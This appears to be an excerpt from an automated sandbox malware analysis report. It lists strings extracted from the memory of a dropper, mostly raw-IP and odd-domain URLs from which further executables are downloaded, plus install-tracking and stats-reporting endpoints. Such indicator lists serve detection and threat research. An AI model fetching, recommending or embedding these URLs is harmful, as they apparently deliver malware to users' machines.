Source: arnatic_5.exe, 00000013.00000003.367160683.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.366530728.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.390807591.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.379289179.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.386445473.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.389034620.0000000006490000.00000004.00000001.sdmp	String found in binary or memory: http://212.193.30.45/WW/file8.exe:
Source: arnatic_5.exe, 00000013.00000003.444466466.0000000000B57000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.441051678.0000000000B57000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.481499097.0000000000B57000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.487716090.0000000000B57000.00000004.00000020.sdmp	String found in binary or memory: http://212.193.30.45/WW/file8.exeC:
Source: arnatic_5.exe, 00000013.00000003.366771160.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.367314983.00000000064E2000.00000004.00000001.sdmp	String found in binary or memory: http://212.193.30.45/WW/file8.exeL
Source: arnatic_5.exe, 00000013.00000003.391018056.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.366771160.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.367314983.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.379403731.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.389251267.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.386800947.00000000064E2000.00000004.00000001.sdmp	String found in binary or memory: http://212.193.30.45/WW/file8.exeM
Source: arnatic_5.exe, 00000013.00000003.432218601.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.366115286.0000000006400000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422623252.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422090570.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.428035807.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.385780381.0000000006400000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.440665183.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.367160683.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.444466466.0000000000B57000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.487746825.0000000000B66000.00000004.00000020.sdmp, arnatic_5.exe, 00000013.00000003.441051678.0000000000B57000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.378612334.00000000063F1000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.429839260.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.390351757.0000000006400000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.366530728.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.443267484.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.417283976.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.481499097.0000000000B57000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.390807591.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.388402199.0000000006400000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.393338295.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.379289179.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.386445473.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.435460183.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.389034620.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.426974875.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.433156043.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.404170127.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.435590558.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.429647736.0000000006490000.00000004.00000001.sdmp	String found in binary or memory: http://212.193.30.45/WW/file9.exe
Source: arnatic_5.exe, 00000013.00000003.367160683.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.366530728.0000000006490000.00000004.00000001.sdmp	String found in binary or memory: http://212.193.30.45/WW/file9.exe.45/WW/file9.exeF
Source: arnatic_5.exe, 00000013.00000003.422623252.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422090570.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.367160683.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.366530728.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.417283976.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.390807591.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.393338295.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.379289179.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.386445473.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.389034620.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.404170127.0000000006490000.00000004.00000001.sdmp	String found in binary or memory: http://212.193.30.45/WW/file9.exe0
Source: arnatic_5.exe, 00000013.00000003.444466466.0000000000B57000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.487746825.0000000000B66000.00000004.00000020.sdmp, arnatic_5.exe, 00000013.00000003.441051678.0000000000B57000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.481499097.0000000000B57000.00000004.00000001.sdmp	String found in binary or memory: http://212.193.30.45/WW/file9.exeC:
Source: arnatic_5.exe, 00000013.00000003.390807591.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.379289179.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.386445473.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.389034620.0000000006490000.00000004.00000001.sdmp	String found in binary or memory: http://212.193.30.45/WW/file9.exeF
Source: arnatic_5.exe, 00000013.00000003.366115286.0000000006400000.00000004.00000001.sdmp	String found in binary or memory: http://212.193.30.45/WW/file9.exeeT
Source: arnatic_5.exe, 00000013.00000003.366115286.0000000006400000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.385780381.0000000006400000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.378612334.00000000063F1000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.390351757.0000000006400000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.388402199.0000000006400000.00000004.00000001.sdmp	String found in binary or memory: http://212.193.30.45/WW/file9.exem
Source: arnatic_5.exe, 00000013.00000003.366115286.0000000006400000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.385780381.0000000006400000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.378612334.00000000063F1000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.390351757.0000000006400000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.388402199.0000000006400000.00000004.00000001.sdmp	String found in binary or memory: http://212.193.30.45/WW/file9.exemZ
Source: arnatic_5.exe, 00000013.00000003.366115286.0000000006400000.00000004.00000001.sdmp	String found in binary or memory: http://212.193.30.45/WW/file9.exexex
Source: arnatic_5.exe, 00000013.00000003.440890233.0000000000B31000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.487556382.0000000000B31000.00000004.00000020.sdmp, arnatic_5.exe, 00000013.00000003.481392115.0000000000B31000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.444306691.0000000000B31000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.456595341.0000000003F13000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.481216374.0000000003EBF000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.423061198.0000000003F12000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.405435576.0000000003F14000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.488676191.0000000003EBF000.00000004.00000001.sdmp	String found in binary or memory: http://45.144.225.57/EU/searchEUunlim.exe
Source: arnatic_5.exe, 00000013.00000003.481216374.0000000003EBF000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.488676191.0000000003EBF000.00000004.00000001.sdmp	String found in binary or memory: http://45.144.225.57/EU/searchEUunlim.exeC:
Source: arnatic_5.exe, 00000013.00000003.456595341.0000000003F13000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.423061198.0000000003F12000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.405435576.0000000003F14000.00000004.00000001.sdmp	String found in binary or memory: http://45.144.225.57/EU/searchEUunlim.exem
Source: arnatic_5.exe, 00000013.00000003.382115209.0000000003F62000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.456595341.0000000003F13000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.382494152.0000000003FA9000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.443299508.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422120188.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.481216374.0000000003EBF000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.367209986.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.393379953.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.423061198.0000000003F12000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.366530728.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.404277078.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.432649001.00000000064C6000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.405435576.0000000003F14000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.406761614.0000000003FA9000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.432285543.00000000064C6000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.417346885.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422671939.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.368167749.0000000003FA9000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.480638589.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.488676191.0000000003EBF000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.456939765.00000000064C6000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.389109056.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.488876494.0000000003F13000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.381720094.0000000003FA9000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.390898314.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.368975549.0000000003FA9000.00000004.00000001.sdmp	String found in binary or memory: http://45.144.225.57/WW/search_target1kpd.exe
Source: arnatic_5.exe, 00000013.00000003.367160683.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.366530728.0000000006490000.00000004.00000001.sdmp	String found in binary or memory: http://45.144.225.57/WW/search_target1kpd.exe/sfx_123_310.exe8
Source: arnatic_5.exe, 00000013.00000003.481318981.0000000003F13000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.456595341.0000000003F13000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.423061198.0000000003F12000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.405435576.0000000003F14000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.488876494.0000000003F13000.00000004.00000001.sdmp	String found in binary or memory: http://45.144.225.57/WW/search_target1kpd.exe4
Source: arnatic_5.exe, 00000013.00000003.481216374.0000000003EBF000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.488676191.0000000003EBF000.00000004.00000001.sdmp	String found in binary or memory: http://45.144.225.57/WW/search_target1kpd.exeC:
Source: arnatic_5.exe, 00000013.00000003.366822613.00000000064F9000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.367378477.00000000064F9000.00000004.00000001.sdmp	String found in binary or memory: http://45.144.225.57/WW/search_target1kpd.exeQ
Source: arnatic_5.exe, 00000013.00000003.391048564.00000000064F9000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.386881565.00000000064F9000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.389372557.00000000064F9000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.379483233.00000000064F9000.00000004.00000001.sdmp	String found in binary or memory: http://45.144.225.57/WW/search_target1kpd.exean
Source: arnatic_5.exe, 00000013.00000003.366822613.00000000064F9000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.367378477.00000000064F9000.00000004.00000001.sdmp	String found in binary or memory: http://45.144.225.57/WW/search_target1kpd.exek
Source: arnatic_5.exe, 00000013.00000003.366822613.00000000064F9000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.367378477.00000000064F9000.00000004.00000001.sdmp	String found in binary or memory: http://45.144.225.57/WW/search_target1kpd.exemp
Source: arnatic_5.exe, 00000013.00000003.366605195.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.427458418.00000000064C5000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.443764679.00000000064C5000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.489749548.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.386604830.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.427009899.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.379326588.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.443299508.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422120188.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.367209986.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.393379953.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.404277078.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.432649001.00000000064C6000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.432285543.00000000064C6000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.417346885.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422671939.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.480638589.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.456939765.00000000064C6000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.389109056.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.390898314.00000000064C0000.00000004.00000001.sdmp	String found in binary or memory: http://45.144.225.57/WW/search_target1kpd.exev
Source: arnatic_5.exe, 00000013.00000003.366605195.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.427458418.00000000064C5000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.443764679.00000000064C5000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.489749548.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.386604830.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.427009899.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.379326588.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.443299508.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422120188.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.367209986.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.393379953.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.404277078.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.432649001.00000000064C6000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.432285543.00000000064C6000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.417346885.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422671939.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.480638589.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.456939765.00000000064C6000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.389109056.00000000064C0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.390898314.00000000064C0000.00000004.00000001.sdmp	String found in binary or memory: http://45.144.225.57/WW/search_target1kpd.exevw9
Source: arnatic_5.exe, 00000013.00000003.366822613.00000000064F9000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.367378477.00000000064F9000.00000004.00000001.sdmp	String found in binary or memory: http://45.144.225.57/WW/search_target1kpd.exez_
Source: arnatic_5.exe, 00000013.00000003.367314983.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.367160683.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.481216374.0000000003EBF000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.379403731.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.366530728.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.417283976.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.390807591.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.389251267.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.393338295.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.379289179.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.488676191.0000000003EBF000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.386445473.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.389034620.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.386800947.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.404170127.0000000006490000.00000004.00000001.sdmp	String found in binary or memory: http://45.144.225.57/WW/sfx_123_310.exe
Source: arnatic_5.exe, 00000013.00000003.481216374.0000000003EBF000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.488676191.0000000003EBF000.00000004.00000001.sdmp	String found in binary or memory: http://45.144.225.57/WW/sfx_123_310.exeC:
Source: arnatic_5.exe, 00000013.00000003.391018056.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.366771160.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.367314983.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.379403731.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.389251267.00000000064E2000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.386800947.00000000064E2000.00000004.00000001.sdmp	String found in binary or memory: http://45.144.225.57/WW/sfx_123_310.exeKd
Source: arnatic_5.exe, 00000013.00000003.432218601.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422623252.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422090570.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.428035807.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.440665183.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.451445539.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.367160683.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.429839260.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.366530728.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.443267484.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.417283976.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.390807591.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.393338295.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.379289179.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.386445473.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.445036124.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.435460183.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.389034620.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.426974875.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.433156043.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.404170127.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.435590558.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.429647736.0000000006490000.00000004.00000001.sdmp	String found in binary or memory: http://45.144.225.57/WW/sfx_123_310.exeW
Source: arnatic_3.exe, 0000000F.00000000.326086475.0000000003520000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: arnatic_5.exe, 00000013.00000003.406395896.0000000003F62000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.488676191.0000000003EBF000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.488876494.0000000003F13000.00000004.00000001.sdmp	String found in binary or memory: http://joinarts.top/check.php?publisher=ww2
Source: arnatic_5.exe, 00000013.00000002.488771629.0000000003EDB000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.481278032.0000000003EDB000.00000004.00000001.sdmp	String found in binary or memory: http://joinarts.top/check.php?publisher=ww2&
Source: arnatic_5.exe, 00000013.00000003.481216374.0000000003EBF000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.488676191.0000000003EBF000.00000004.00000001.sdmp	String found in binary or memory: http://joinarts.top/check.php?publisher=ww2C:
Source: arnatic_5.exe, 00000013.00000003.481318981.0000000003F13000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.456595341.0000000003F13000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.423061198.0000000003F12000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.405435576.0000000003F14000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.488876494.0000000003F13000.00000004.00000001.sdmp	String found in binary or memory: http://joinarts.top/check.php?publisher=ww2I
Source: arnatic_5.exe, 00000013.00000003.481318981.0000000003F13000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.456595341.0000000003F13000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.423061198.0000000003F12000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.405435576.0000000003F14000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.488876494.0000000003F13000.00000004.00000001.sdmp	String found in binary or memory: http://joinarts.top/check.php?publisher=ww2W
Source: 0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe, 00000001.00000003.291491317.0000000002B50000.00000004.00000001.sdmp, 0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe, 00000001.00000003.291271193.0000000001FE0000.00000004.00000001.sdmp, setup_install.exe, 00000007.00000002.304539323.0000000064957000.00000008.00020000.sdmp	String found in binary or memory: http://mingw-w64.sourceforge.net/X
Source: setup_install.exe, 00000007.00000003.296106978.0000000002710000.00000004.00000001.sdmp	String found in binary or memory: http://motiwa.xyz/
Source: setup_install.exe, 00000007.00000003.296106978.0000000002710000.00000004.00000001.sdmp	String found in binary or memory: http://motiwa.xyz/myip.phpaddInstall.php?key=125478824515ADNxu2ccbwe&ip=&oid=4addInstallImpression.p
Source: arnatic_5.exe, 00000013.00000003.421330234.0000000003F53000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.406202096.0000000003F1C000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.456595341.0000000003F13000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.488635760.0000000003EB0000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.423061198.0000000003F12000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.405510339.0000000003F1C000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.488876494.0000000003F13000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.444387304.0000000000B49000.00000004.00000001.sdmp	String found in binary or memory: http://stylesheet.faseaegasdfase.com/hp8/g1/rtst1053.exe
Source: arnatic_5.exe, 00000013.00000003.481529607.0000000003EB1000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.488635760.0000000003EB0000.00000004.00000001.sdmp	String found in binary or memory: http://stylesheet.faseaegasdfase.com/hp8/g1/rtst1053.exeC:
Source: arnatic_5.exe, 00000013.00000003.432218601.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422623252.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422090570.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.428035807.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.440665183.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.451445539.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.367160683.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.429839260.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.366530728.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.443267484.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.417283976.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.390807591.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.481196410.0000000003EB7000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.488655870.0000000003EB7000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.393338295.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.379289179.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.386445473.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.445036124.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.435460183.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.389034620.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.426974875.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.433156043.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.404170127.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.435590558.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.429647736.0000000006490000.00000004.00000001.sdmp	String found in binary or memory: http://tg8.cllgxx.com/sr21/siww1047.exe
Source: arnatic_5.exe, 00000013.00000003.481196410.0000000003EB7000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.488655870.0000000003EB7000.00000004.00000001.sdmp	String found in binary or memory: http://tg8.cllgxx.com/sr21/siww1047.exeC:
Source: arnatic_5.exe, 00000013.00000003.422623252.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.422090570.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.367160683.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.366530728.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.417283976.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.390807591.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.393338295.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.379289179.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.386445473.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.389034620.0000000006490000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.404170127.0000000006490000.00000004.00000001.sdmp	String found in binary or memory: http://tg8.cllgxx.com/sr21/siww1047.exev
Source: arnatic_5.exe, 00000013.00000003.440924023.0000000000B36000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.481412159.0000000000B36000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.487584514.0000000000B36000.00000004.00000020.sdmp	String found in binary or memory: http://wfsdragon.ru/api/setStats.php
